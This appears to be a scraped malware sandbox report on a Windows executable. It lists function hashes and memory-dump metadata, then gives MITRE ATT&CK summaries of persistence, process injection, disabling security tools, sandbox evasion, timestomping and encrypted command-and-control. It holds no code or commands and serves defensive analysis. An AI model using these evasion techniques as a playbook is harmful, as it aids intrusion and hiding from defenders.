Uniqueness Score: -1.00%

Function 02B51FA7 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1536683825.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2b50000_9K25QyJ4hA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 694cefe70aaed3c70972c073ddb400078bb450d0d3577099e48aa731cd15a2a7
Instruction ID: 678f004df9d8e90c14aab7d3d6f1df15a7f7def0bdace6fb8c376a4abb96cb8e
Opcode Fuzzy Hash: 694cefe70aaed3c70972c073ddb400078bb450d0d3577099e48aa731cd15a2a7
Instruction Fuzzy Hash: 79F05439614215AFC754DF4DD440FAABBAAFFC9261B14C0AAF849CB311DB319886CB91

Uniqueness

Uniqueness Score: -1.00%

Function 02B51A13 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1536683825.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2b50000_9K25QyJ4hA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25c6cea14ea7d3e5bd0b73a827f3c169a8144222d8a99082f7f4cc379741449f
Instruction ID: 1475f3027195a49568dac84f557a61283ab4fcb7701cad649703df1381dba6bb
Opcode Fuzzy Hash: 25c6cea14ea7d3e5bd0b73a827f3c169a8144222d8a99082f7f4cc379741449f
Instruction Fuzzy Hash: 31D0C935F1000DDBCB14CFCAE8808ECBB31EFC5635F005255D565AB2A0C771A9168F84

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: 9K25QyJ4hA.exePID: 5440, Parent PID: 4084COMMON

Executed Functions

Function 02EA15E0 Relevance: .3, Instructions: 271COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1843887089.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2ea0000_9K25QyJ4hA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d117125b1f1d8543a80e8b68f3c3998610ce9415191baff844b2d3b8f3ddd0d
Instruction ID: b485c5c3de78366acbb1ba1db64cb119bb28fc64c83b0898d6f3870b47fe2db8
Opcode Fuzzy Hash: 0d117125b1f1d8543a80e8b68f3c3998610ce9415191baff844b2d3b8f3ddd0d
Instruction Fuzzy Hash: 55C1CE74D01209CFDB14CFA9C490ADDBBF6BF89304F24926AD419AB365DB30A946CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02EA0828 Relevance: .3, Instructions: 270COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1843887089.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2ea0000_9K25QyJ4hA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71fbd2f0138a34e55d1cc1ff9a8e2e49eaabebf65ef6e2e20da8763a654b885f
Instruction ID: a9d82b053294fb02dc8b7408a4ef81ac2e6dd14253e043ddbb2d1be2b9c0742e
Opcode Fuzzy Hash: 71fbd2f0138a34e55d1cc1ff9a8e2e49eaabebf65ef6e2e20da8763a654b885f
Instruction Fuzzy Hash: 50C1FF74E00219CFDB14DFA9D894A9DBBB2FF89300F2081A9D419AB3A4DB34AC41CF54

Uniqueness

Uniqueness Score: -1.00%

Function 02EA0870 Relevance: .3, Instructions: 255COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1843887089.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2ea0000_9K25QyJ4hA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a53a97adc7e41e4b67fe70f07555365c828885fca282b5b8723d178815b6c609
Instruction ID: 0578645ae1db05639ef0b617e8e0a3f3404be91a5514fe349aaf842cedf6d018
Opcode Fuzzy Hash: a53a97adc7e41e4b67fe70f07555365c828885fca282b5b8723d178815b6c609
Instruction Fuzzy Hash: C1B1CF74E00219CFDB54DFA9D994AADBBB2FF89300F2081A9D419BB364DB35A941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 02EA0880 Relevance: .2, Instructions: 248COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1843887089.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2ea0000_9K25QyJ4hA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f26eb71ac1cf0cc7778875babc1f0dc8c181e82f43fd425e01b0c18f4405cfb0
Instruction ID: 18edfe1ed4e75da3736e24943c749a3748c22eae7bd75badf5e75a7172251418
Opcode Fuzzy Hash: f26eb71ac1cf0cc7778875babc1f0dc8c181e82f43fd425e01b0c18f4405cfb0
Instruction Fuzzy Hash: ADB1CF74E00219DFDB14DFA9D994A9DBBB2FF89300F208169D419BB364DB35A941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 02EA1230 Relevance: .2, Instructions: 192COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1843887089.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2ea0000_9K25QyJ4hA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09066868f9011b72a46cc8e69a582d33306f40fdc879b1a8daadf3ee0306f6a9
Instruction ID: 12e7cd7e477a8f7cc4b17c3b79c0239d1ccf2aefc4a64f7de7bdc733652fdb91
Opcode Fuzzy Hash: 09066868f9011b72a46cc8e69a582d33306f40fdc879b1a8daadf3ee0306f6a9
Instruction Fuzzy Hash: 3E916E74A02209DFCB44CFA9D68499DFBF6BF89310B258265E809AB365D730EE45CF50

Uniqueness

Uniqueness Score: -1.00%

Function 02EA2DB4 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1843887089.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2ea0000_9K25QyJ4hA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9568514bd1b9d2ce473109986c60f6bf6b3045519ffa47407f89799f3a4b724
Instruction ID: 8e1860f914b351d59de2efee7188466755536b60927c53da333502c0958aee51
Opcode Fuzzy Hash: b9568514bd1b9d2ce473109986c60f6bf6b3045519ffa47407f89799f3a4b724
Instruction Fuzzy Hash: B8113D70D442488FDB29DF64D8547EEBBF1BF8A304F14E12AD80177254CB305884CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02EA15D2 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1843887089.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2ea0000_9K25QyJ4hA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7204fcd034760e96fe959957134beee111de7a4fef1376c55a93845a530f7188
Instruction ID: a1b98e6384b47aeee6d3521457397d0e64de64fac0e5b0d4a3d99903c46309e0
Opcode Fuzzy Hash: 7204fcd034760e96fe959957134beee111de7a4fef1376c55a93845a530f7188
Instruction Fuzzy Hash: 38410370D40218CFDB24CFA8C594AEDBBF6FF89304F18916AD409AB265DB31A946CF54

Uniqueness

Uniqueness Score: -1.00%

Function 02EA2105 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1843887089.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2ea0000_9K25QyJ4hA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a66b38bcef01fac591516ee4e5f107bf772422a1a5a3ba58fdbd674646c86fd
Instruction ID: 48bd1f48ae7b50806b970c0e50e511f25a3c1c9b4870cf0d4cd50855c5be8984
Opcode Fuzzy Hash: 6a66b38bcef01fac591516ee4e5f107bf772422a1a5a3ba58fdbd674646c86fd
Instruction Fuzzy Hash: 7E415971D00248EFDB14CFA9D890ADEBBF1BF48354F24842AE919AB254C7356945CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02EA1E70 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1843887089.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2ea0000_9K25QyJ4hA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b0888d89317c32bed88c891976460717317734349163a689422bac4588265dd
Instruction ID: a87cc65c32d3fbd1d501573982621a15698e1189a25626f77cc4b1a36360403e
Opcode Fuzzy Hash: 3b0888d89317c32bed88c891976460717317734349163a689422bac4588265dd
Instruction Fuzzy Hash: 0131AF31B042459FDB14CF69C890A9EFBF6EF88250F14C16AE84A9B351DB31AC41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02EA2110 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1843887089.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2ea0000_9K25QyJ4hA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4db670a90845bc9b942da8f4d5ea4f7f1cfad74b15f8933b7b3c89e4547a308
Instruction ID: 4a3b15e67ddc1d10aae1d459f8a09048ddf1b4452952733ac68d30b711df0fef
Opcode Fuzzy Hash: b4db670a90845bc9b942da8f4d5ea4f7f1cfad74b15f8933b7b3c89e4547a308
Instruction Fuzzy Hash: 44310670D00258EFDB14CFAAD590ADEBFF5AF48304F248419E919AB250DB75A945CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02EA1220 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1843887089.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2ea0000_9K25QyJ4hA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21eba7961a19b7bd6d34d5b3d68df1c60b2a0782a50131d49c1cd56e5d03c1d7
Instruction ID: 41076fc67310676fb9fffadd8d08cd0083f83f260a8b5d76bdf22b1110e5d6aa
Opcode Fuzzy Hash: 21eba7961a19b7bd6d34d5b3d68df1c60b2a0782a50131d49c1cd56e5d03c1d7
Instruction Fuzzy Hash: 5F310335A01208DFCB18CFA9D5949EDBBF6FF89314F24816AE405AB224E730A945CF60

Uniqueness

Uniqueness Score: -1.00%

Function 014BD6DC Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1843412299.00000000014BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_14bd000_9K25QyJ4hA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6957cd14f0078f0da2e7278cf74648eae4cdbdde0c673c6c2d407014aa50064
Instruction ID: 788c5e6b59c731396831769a7291de8c61c7d076835caf7223ac0b38e9db263a
Opcode Fuzzy Hash: d6957cd14f0078f0da2e7278cf74648eae4cdbdde0c673c6c2d407014aa50064
Instruction Fuzzy Hash: 1E210875904284DFDB05DF54D9C0B97BBA5FB84318F2081AAE8090B266C336D456C6B1

Uniqueness

Uniqueness Score: -1.00%

Function 014BD5F0 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1843412299.00000000014BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_14bd000_9K25QyJ4hA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87c6e9bc811c5436f87a58772776f6fd80bf0e109e38332b7095de158bcd90b7
Instruction ID: 72eddc250dd455416ca7bf3f83ab9c6ea95e160546989c7d987c96f704f3f146
Opcode Fuzzy Hash: 87c6e9bc811c5436f87a58772776f6fd80bf0e109e38332b7095de158bcd90b7
Instruction Fuzzy Hash: B12103B5904240DFDB05DF94D9C0B67BBA5FB88318F2485AAE80D0B266C336D456CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 02EA14BF Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1843887089.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2ea0000_9K25QyJ4hA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a966cf649528a8680cfffa7551b15f3d27b52ace43c7b134a4936689f78b9864
Instruction ID: 57ddc0cd1f07bce02192593a6de14d7c45998da5c001004a93dc6dccff389e1a
Opcode Fuzzy Hash: a966cf649528a8680cfffa7551b15f3d27b52ace43c7b134a4936689f78b9864
Instruction Fuzzy Hash: AA214474E0025E9FCF05DFA9C4509DDBBB6FF89610B0182AAD451AB261DB30A906CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 02EA111A Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1843887089.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2ea0000_9K25QyJ4hA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fd66288529b40d02425ad91ceb107933ad3984ebea91106e0822016d531f87e
Instruction ID: 4f182a8fbfb8e848f125213dec7f944bd8fb8315e0544c5cc98e32d81fabcfd9
Opcode Fuzzy Hash: 0fd66288529b40d02425ad91ceb107933ad3984ebea91106e0822016d531f87e
Instruction Fuzzy Hash: AA214A70D0021A9FCF01DFA8D4509EDBBB1FF89710F4182AAD494BB265D730A946CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 02EA0C39 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1843887089.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2ea0000_9K25QyJ4hA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42fb98f7fb70d22e2981b5cd71ffe75a8f5c90e833677632968759834ca568df
Instruction ID: 62742842528de075be25093dd8a12c3c70ff177f8a7687859c1f8616747f1e32
Opcode Fuzzy Hash: 42fb98f7fb70d22e2981b5cd71ffe75a8f5c90e833677632968759834ca568df
Instruction Fuzzy Hash: 69213474E112089FDB48CFA9D594ADEBBF2BF89310F20912AE405B7264DB315C44CB68

Uniqueness

Uniqueness Score: -1.00%

Function 014BD006 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1843412299.00000000014BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_14bd000_9K25QyJ4hA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 105e9093d93c218b2673c3cc59ec0c6feb1ec0b6a45e65a42f6706d5a68cd95e
Instruction ID: 57a18a4314e3475812878019a9ea456d7d887c40fee71a5ecac5794f50e63d5c
Opcode Fuzzy Hash: 105e9093d93c218b2673c3cc59ec0c6feb1ec0b6a45e65a42f6706d5a68cd95e
Instruction Fuzzy Hash: C7118C6140E3D05FD7138B298CA4692BFB49F53228F0981CBD984CF1B3C2694849C732

Uniqueness

Uniqueness Score: -1.00%

Function 02EA1128 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1843887089.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2ea0000_9K25QyJ4hA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5b60172c34356a43d9eb480a46c547c0a78381c267542dc2f14c6d115aa417c
Instruction ID: 9a736d69363a0427ab8f072352388e446e8e92f3ae0bf86326c63b833cba69c5
Opcode Fuzzy Hash: c5b60172c34356a43d9eb480a46c547c0a78381c267542dc2f14c6d115aa417c
Instruction Fuzzy Hash: C721F575D0021A9FCF01DFA8D4509DDBBB6FF89710F4182AAD494BB265DB30A906CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 014BD6D7 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1843412299.00000000014BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_14bd000_9K25QyJ4hA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a772179decf110bb882872cb952e1b13b119dd61991aef1ad72797cf3e64a4
Instruction ID: 58927228b726780806c996378f86102e35c0fdd6ddf3f365348499249b6ecdd8
Opcode Fuzzy Hash: 01a772179decf110bb882872cb952e1b13b119dd61991aef1ad72797cf3e64a4
Instruction Fuzzy Hash: 9B11A276904284DFCB06CF54D5C4B56BF62FB84318F2485AAD8090B666C336D456CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 014BD5EB Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1843412299.00000000014BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_14bd000_9K25QyJ4hA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a772179decf110bb882872cb952e1b13b119dd61991aef1ad72797cf3e64a4
Instruction ID: 341c71c101409b641e4507219e1ed5c3b873fd10a96c42e7b0423a24628dc18b
Opcode Fuzzy Hash: 01a772179decf110bb882872cb952e1b13b119dd61991aef1ad72797cf3e64a4
Instruction Fuzzy Hash: 1211B176904280CFCB16CF54D5C4B56BF71FB88318F28C5AAD8490B667C33AD45ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 014BD031 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1843412299.00000000014BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_14bd000_9K25QyJ4hA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87d37338ae4f80fc42ef26a6054199ae344091636900a3b0ec45e3f6b2522380
Instruction ID: 68167cebf9c80fe8582bae2ba8edb727fd8869810a6afb6960933e67f9e5bb34
Opcode Fuzzy Hash: 87d37338ae4f80fc42ef26a6054199ae344091636900a3b0ec45e3f6b2522380
Instruction Fuzzy Hash: 8E01ACB19043449BE7104A69CCC47E7BFD8EF8166CF14C46BDD054A253C7759442C672

Uniqueness

Uniqueness Score: -1.00%

Function 02EA1940 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1843887089.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2ea0000_9K25QyJ4hA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e85c2de0122ff65078bebe82bf013df627966f9d81828e5d1285275b454d3785
Instruction ID: f8d8799432fe78d801287d68c0237ca893eda304d8efdcdd4e51066d737bd86e
Opcode Fuzzy Hash: e85c2de0122ff65078bebe82bf013df627966f9d81828e5d1285275b454d3785
Instruction Fuzzy Hash: A911D078A40218CFDB64DF68C994B9CBBF1BF48300F1091A9D409AB261DB34AD86CF50

Uniqueness

Uniqueness Score: -1.00%

Function 02EA1FA7 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1843887089.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2ea0000_9K25QyJ4hA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec0296ba2f4ee92a1c7fabf1b561deabc063baa069bf01cd39d70b308036c0da
Instruction ID: e845a43c3b430151a8dc3f7c46086bc7835ec402d7d81819e2ce700092a70057
Opcode Fuzzy Hash: ec0296ba2f4ee92a1c7fabf1b561deabc063baa069bf01cd39d70b308036c0da
Instruction Fuzzy Hash: D9F0FA34A08244AFCB14CF59D4808EABBB6EFC5230718C09BE808CB362CB359C02CB20

Uniqueness

Uniqueness Score: -1.00%

Function 02EA1F78 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1843887089.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2ea0000_9K25QyJ4hA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e4e0f732643afc846918fcd9db91a3dde0ef79c40910025f4b0780490b19eec
Instruction ID: baa0fcdc141bd6f81e7e40d61854ea4109bf2ff55a854cd9afd7505519832d77
Opcode Fuzzy Hash: 8e4e0f732643afc846918fcd9db91a3dde0ef79c40910025f4b0780490b19eec
Instruction Fuzzy Hash: FBF0E235B482448FDB049BA9A8106BE7B75EFD7726F14C0ABE4099E255D7304914D362

Uniqueness

Uniqueness Score: -1.00%

Function 02EA1A13 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1843887089.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2ea0000_9K25QyJ4hA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26311c931a6a790f5bdf8a06bce5abf07371997fa7856235014be0af3943f662
Instruction ID: 1475f3027195a49568dac84f557a61283ab4fcb7701cad649703df1381dba6bb
Opcode Fuzzy Hash: 26311c931a6a790f5bdf8a06bce5abf07371997fa7856235014be0af3943f662
Instruction Fuzzy Hash: 31D0C935F1000DDBCB14CFCAE8808ECBB31EFC5635F005255D565AB2A0C771A9168F84

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 9K25QyJ4hA.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

